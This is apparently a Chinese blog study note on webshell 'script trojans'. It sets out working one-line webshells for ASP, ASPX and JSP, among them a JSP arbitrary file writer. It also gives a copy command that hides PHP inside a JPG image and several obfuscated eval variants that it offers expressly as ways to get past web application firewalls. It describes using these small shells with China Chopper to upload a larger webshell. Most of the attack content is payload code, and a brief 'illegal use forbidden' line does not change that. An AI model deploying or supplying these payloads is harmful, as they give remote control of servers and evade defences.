某教程学习笔记(一):13、脚本木马原理

简介: 某教程学习笔记(一):13、脚本木马原理


一、一句话木马,隐蔽性强,功能强大,为上传大马做准备


1、php一句话


将一句话上传到服务器

0a2653c851af460fa595bd959398a8f1.png

用菜刀连接


0eacb84100b54626af849e6b562bf92a.png2d65d23f6d4748949b924e4057485923.png


读取数据库

2e9b90b2ca334476abebe75bafe6eeaa.png

终端运行命令

0a2653c851af460fa595bd959398a8f1.png

2、asp一句话


<% eval request(“aiyou”) %>


3、aspx一句话


<%@ Page Language=“Jscript”%>


<%eval(Request.Item[“value”],“unsafe”);%>


4、jsp一句话


<% if(request.getParameter(“f”)!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter(“f”))).write(request.getParameter(“t”).getBytes());%>


5、图片马


cmd下做一句话


copy /b1.jpg+1.php 2.jpg

0eacb84100b54626af849e6b562bf92a.png

C32ASM做一句话

2d65d23f6d4748949b924e4057485923.png

二、一句话变形,waf会拦截一句话,可以通过变形绕过


<%eval(request(chr(112)))%>


<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))(“aiyou”))%>


<%eval""&(“e”&“v”&“a”&“l”&"("&“r”&“e”&“q”&“u”&“e”&“s”&“t”&"("&“0”&"-"&“2”&-"&“5”&")"&")")%>


<%a=request(“aiyou”)%><%eval a%>


三、大马,功能比小马的功能更加强大


上传小马后用菜刀连接,然后再通过菜刀上传大马

0a2653c851af460fa595bd959398a8f1.png

禁止非法,后果自负


目录
相关文章
|
6月前
|
安全 前端开发 JavaScript
某教程学习笔记(一):06、漏洞分析(工具篇)
某教程学习笔记(一):06、漏洞分析(工具篇)
67 0
|
5月前
|
安全 Shell PHP
一篇文章讲明白Kali学习笔记30:身份认证与命令执行漏洞
一篇文章讲明白Kali学习笔记30:身份认证与命令执行漏洞
24 0
|
安全 小程序 Windows
[笔记]攻防工具分享之 CobaltStrike框架 《二》生成后门
[笔记]攻防工具分享之 CobaltStrike框架 《二》生成后门
210 0
|
6月前
|
开发框架 Java .NET
32、webshell简介
32、webshell简介
43 0
|
安全 关系型数据库 MySQL
黑吃黑Getshell到提权实战案例
黑吃黑Getshell到提权实战案例
326 0
|
运维 关系型数据库 MySQL
绕过360安全卫士提权实战案例
绕过360安全卫士提权实战案例
405 1
|
开发框架 安全 .NET
冰蝎WebShell免杀工具(支持4.0.6)
冰蝎WebShell免杀工具(支持4.0.6)
626 0
|
开发框架 安全 JavaScript
某教程学习笔记(一):14、上传漏洞讲解
某教程学习笔记(一):14、上传漏洞讲解
102 0
某教程学习笔记(一):14、上传漏洞讲解
|
监控 安全 Windows
Metasploit -- 木马生成原理和方法
Metasploit -- 木马生成原理和方法
709 0
Metasploit -- 木马生成原理和方法
|
存储 JavaScript 安全
pikachu 靶场之XSS(跨站脚本) -下篇
pikachu 靶场之XSS(跨站脚本) -下篇
170 0
下一篇
无影云桌面